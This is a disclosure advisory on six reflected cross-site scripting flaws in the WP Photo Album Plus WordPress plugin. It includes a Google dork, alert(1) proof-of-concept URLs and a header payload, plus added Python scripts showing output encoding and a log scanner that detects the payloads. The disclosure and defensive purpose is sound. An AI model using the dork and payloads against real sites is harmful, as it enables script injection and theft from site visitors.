WP Photo Album Plus Security Vulnerabilities
Author: Milhouse
Download: https://wordpress.org/plugins/wp-photo-album-plus/
Home Page: http://wppa.opajaap.nl/
Google dork: inurl:wp-content/plugins/wp-photo-album-plus
Set up:
WordPress version: 3.9.1, 3.9.2
WP Photo Album Plus version: 5.4.4, 5.4.3
Client browsers: Firefox 31, Internet Explorer 8-11
Issue number 1: A Cross-Site Scripting (reflective) vulnerability.
Details:
The plugin echoes the value of the HTTP header “User-Agent” back to the client browser without sanitizing it, allowing arbitrary JavaScript to be inserted.
Severity: Low
Proof of Concept (POC):
Request:
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) 47b5a--><script>alert(1)</script>0aa96
Accept-Encoding: gzip, deflate
Host: <vulnerablesite.example>
DNT: 1
Proxy-Connection: Keep-Alive
Pragma: no-cache
Issue number 2: A Cross-Site Scripting (reflective) vulnerability.
Details:
The value of the wppa-album parameter is inserted into a JavaScript string. A payload supplied in the wppa-album parameter is echoed back unmodified to the client browser.
Severity: High
Proof of Concept (POC):
http://vulnerablesite.example/?page_id=109&wppa-album=0178d4<%2fscript><script>alert(1)<%2fscript>75f6e&wppa-cover=0&wppa-occur=1&wppa-tag=
Issue number 3: Cross-Site Scripting (Reflective) Vulnerability.
Severity: High
Details:
The supplied value of the request parameter wppa-lasten is vulnerable to cross-site scripting. By using an event handler such as “onmouseover” it is possible to insert arbitrary JavaScript into the page.
Proof of concept (POC):
http://vulnerablesite.example/?wppa-occur=1&wppa-lasten=102dbdd"%20onmouseover%3dalert(1)%20fd679&page_id=10&wppa-album=0&wppa-photo=2
Issue number 4: Cross-Site Scripting (Reflective) vulnerability
Severity: High
Details:
The value supplied to the wppa-searchstring parameter is copied into the value of an HTML tag attribute. It is possible to use a style attribute to introduce arbitrary JavaScript into the application's response.
Proof of Concept (POC):
http://vulnerablesite.example/?page_id=110&wppa-search-submit=wppa-search-submit%3dSearch&wppa-searchstring=cd84d"style%3d"behavior%3aurl(%23default%23time2)"onbegin%3d"alert(1)"3b512b44ea8&wppa-searchroot=
Issue number 5: Cross-Site Scripting (reflective)
Severity: High
Details:
This is similar to issue three. The value supplied to the wppa-topten parameter is inserted into the value of an HTML tag attribute. By using an event handler such as “onmouseover” it is possible to inject arbitrary JavaScript into the page.
Proof of Concept:
http://vulnerablesite.example/?wppa-occur=1&wppa-topten=10eb700"%20onmouseover%3dalert(1)%203c53f&&page_id=12&wppa-album=0&wppa-photo=2
Issue number 6: Cross-Site Scripting (Reflective) Vulnerability.
Severity: High
Details:
This is similar to issue number four. The value supplied to the s (search) parameter is copied into the value of an HTML tag attribute. It is possible to use a style attribute to introduce arbitrary JavaScript into the application's response. The plugin appears to use the value of s (search) in the same way as the value of wppa-searchstring.
Proof of Concept:
http://vulnerablesite.example/?s=7d0ba"style%3d"behavior%3aurl(%23default%23time2)"onbegin%3d"alert(1)"3924b
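All six issues share one root cause: a request value is written into the response without encoding for the context it lands in. The script below is an added example; it is not part of this advisory and not the plugin's code. It models the three output contexts the issues describe (an HTML comment for the User-Agent, a JavaScript string literal for wppa-album, and a quoted attribute value for wppa-lasten, wppa-searchstring, wppa-topten and s), renders the advisory's own proof-of-concept values both raw and encoded, and uses a tolerant HTML parser to show whether the value escaped its context. The encoders are Python's html.escape and json.dumps; the WordPress functions named in the comments (esc_html, esc_attr, wp_json_encode) are the in-plugin equivalents a fix would call. The function names render_comment, render_script and render_attr and the markup templates are assumptions for illustration, not the plugin's real output.

```python
import html
import json
from html.parser import HTMLParser

# Constructed inputs: the advisory's proof-of-concept values, URL-decoded,
# with the random delimiter strings the scanner used left in place.
UA_PAYLOAD = "Mozilla/5.0 (compatible; MSIE 10.0) 47b5a--><script>alert(1)</script>0aa96"
ALBUM_PAYLOAD = "0178d4</script><script>alert(1)</script>75f6e"
LASTEN_PAYLOAD = '102dbdd" onmouseover=alert(1) fd679'
SEARCH_PAYLOAD = 'cd84d"style="behavior:url(#default#time2)"onbegin="alert(1)"3b512b44ea8'


def for_html(value: str) -> str:
    """Encoder for HTML text, HTML comments and quoted attribute values.
    Escapes & < > " and ' so the value can never close the enclosing comment,
    tag or attribute.  WordPress equivalents: esc_html() / esc_attr()."""
    return html.escape(value, quote=True)


def for_js_string(value: str) -> str:
    """Encoder for a value placed inside a <script> block.  JSON-encodes the
    value (quotes, backslashes and newlines are escaped) and hex-escapes < > &
    as well, so the literal '</script>' cannot appear inside the string.
    WordPress equivalent: wp_json_encode() with JSON_HEX_TAG | JSON_HEX_AMP."""
    encoded = json.dumps(value)
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def js_roundtrip(value: str) -> bool:
    """The encoding is lossless: the browser's JS parser reads back the original."""
    return json.loads(for_js_string(value)) == value


# --- Three sinks modelled on the advisory (assumed templates, not the plugin's markup)

def render_comment(user_agent: str, encode: bool) -> str:
    """Issue 1: the User-Agent header reflected into an HTML comment."""
    v = for_html(user_agent) if encode else user_agent
    return f"<!-- client: {v} -->"


def render_script(album: str, encode: bool) -> str:
    """Issue 2: the wppa-album value placed inside a JavaScript string literal."""
    v = for_js_string(album) if encode else f'"{album}"'
    return f"<script>var wppaAlbum = {v};</script>"


def render_attr(name: str, value: str, encode: bool) -> str:
    """Issues 3-6: a request parameter copied into a quoted attribute value."""
    v = for_html(value) if encode else value
    return f'<input type="hidden" name="{name}" value="{v}">'


# --- Checks: does the rendered markup still have the structure the template intended?

class _AttrCollector(HTMLParser):
    """Records the attribute names a tolerant HTML parser finds on each start tag."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.extend(name for name, _ in attrs)


def attribute_names(markup: str) -> list:
    """Attribute names the parser sees; an injected on* or style attribute shows up here."""
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.names


def script_tag_count(markup: str) -> int:
    """Number of <script openers; the template contributes at most one."""
    return markup.lower().count("<script")


def comment_close_count(markup: str) -> int:
    """Number of comment closers; the template contributes exactly one."""
    return markup.count("-->")


if __name__ == "__main__":
    for encode in (False, True):
        print("encoded" if encode else "raw")
        print(" ", render_comment(UA_PAYLOAD, encode))
        print(" ", render_script(ALBUM_PAYLOAD, encode))
        print(" ", render_attr("wppa-lasten", LASTEN_PAYLOAD, encode))
        print(" ", render_attr("wppa-searchstring", SEARCH_PAYLOAD, encode))
```

Running the script prints each sink twice; in the raw renderings the parser reports the extra script tag, the second comment closer and the injected onmouseover, style and onbegin attributes, while the encoded renderings keep exactly the structure of the template. The point for a fix is that the encoder is chosen by the context the value is written into, not by which parameter it came from.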
Resolution:
The developer fixed the issues immediately after disclosure. Update the plugin to the latest version.
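Because every issue is reflected and the payload travels in the query string or in the User-Agent header, attempts against an unpatched site are visible in the web server access log. The script below is an added example, not part of the advisory or the plugin: it scans constructed Apache/nginx combined-format log lines for the parameters named above (wppa-album, wppa-lasten, wppa-topten, wppa-searchstring, s) and for the User-Agent header, URL-decodes each value and flags markup-breaking content. The log lines, client addresses and timestamps are made up for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters the advisory identifies as reflected into the response.
WATCHED_PARAMS = {"wppa-album", "wppa-lasten", "wppa-topten", "wppa-searchstring", "s"}

# Fragments that have no business in an album id, a count or a search term:
# a tag opener, a quote that starts a new attribute, an on* event handler,
# a style attribute, or a javascript: URL.  A quoted phrase search such as
# "summer holiday" does not match, which keeps the rule quiet on the s parameter.
SUSPECT = re.compile(r'<|"\s*[a-z-]+\s*=|\bon[a-z]+\s*=|\bstyle\s*=|javascript:', re.IGNORECASE)

# Apache/nginx combined log format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines; addresses and timestamps are made up for the example.
SAMPLE_LOG = [
    # benign album view
    '203.0.113.5 - - [10/Aug/2014:12:00:01 +0000] "GET /?page_id=109&wppa-album=12&wppa-cover=0 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/31.0"',
    # issue 2 value in wppa-album, URL-encoded as a browser would send it
    '203.0.113.5 - - [10/Aug/2014:12:00:02 +0000] "GET /?page_id=109&wppa-album=0178d4%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E75f6e&wppa-cover=0 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/31.0"',
    # issue 3 value in wppa-lasten
    '203.0.113.5 - - [10/Aug/2014:12:00:03 +0000] "GET /?wppa-occur=1&wppa-lasten=102dbdd%22%20onmouseover%3dalert(1)%20fd679&page_id=10 HTTP/1.1" 200 4800 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/31.0"',
    # issue 4 value in wppa-searchstring
    '203.0.113.5 - - [10/Aug/2014:12:00:04 +0000] "GET /?page_id=110&wppa-search-submit=Search&wppa-searchstring=cd84d%22style%3d%22behavior%3aurl(%23default%23time2)%22onbegin%3d%22alert(1)%223b512b44ea8&wppa-searchroot= HTTP/1.1" 200 4900 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/31.0"',
    # issue 1 value carried in the User-Agent header
    '198.51.100.7 - - [10/Aug/2014:12:00:05 +0000] "GET / HTTP/1.1" 200 4000 "-" "Mozilla/5.0 (compatible; MSIE 10.0) 47b5a--><script>alert(1)</script>0aa96"',
    # benign quoted-phrase search on the s parameter
    '203.0.113.9 - - [10/Aug/2014:12:00:06 +0000] "GET /?s=%22summer+holiday%22 HTTP/1.1" 200 3000 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/31.0"',
]


def scan_line(line: str) -> list:
    """Return (client, timestamp, location, decoded_value) for each suspect value in one line."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    findings = []
    params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    for name, values in params.items():
        if name not in WATCHED_PARAMS:
            continue
        for value in values:
            decoded = unquote(value)  # second decode catches double-encoded payloads
            if SUSPECT.search(decoded):
                findings.append((m["ip"], m["ts"], name, decoded))
    ua = m["ua"]
    if SUSPECT.search(ua) or "-->" in ua:
        findings.append((m["ip"], m["ts"], "User-Agent", ua))
    return findings


def scan(lines) -> list:
    """Scan an iterable of log lines and return all findings in order."""
    return [finding for line in lines for finding in scan_line(line)]


if __name__ == "__main__":
    for ip, ts, where, value in scan(SAMPLE_LOG):
        print(f"{ts} {ip} {where}: {value}")
```

On the sample input the scanner reports the four injected values and stays silent on the ordinary album view and the quoted-phrase search. Because the response is reflected per request, a hit in the log means an attempt, not a compromise; the useful follow-up is to confirm the plugin is on a fixed version and to check whether the same client addresses appear elsewhere in the log. Logs that record the User-Agent with escaped quotes, or that use a custom format, need the LOG_LINE pattern adjusted.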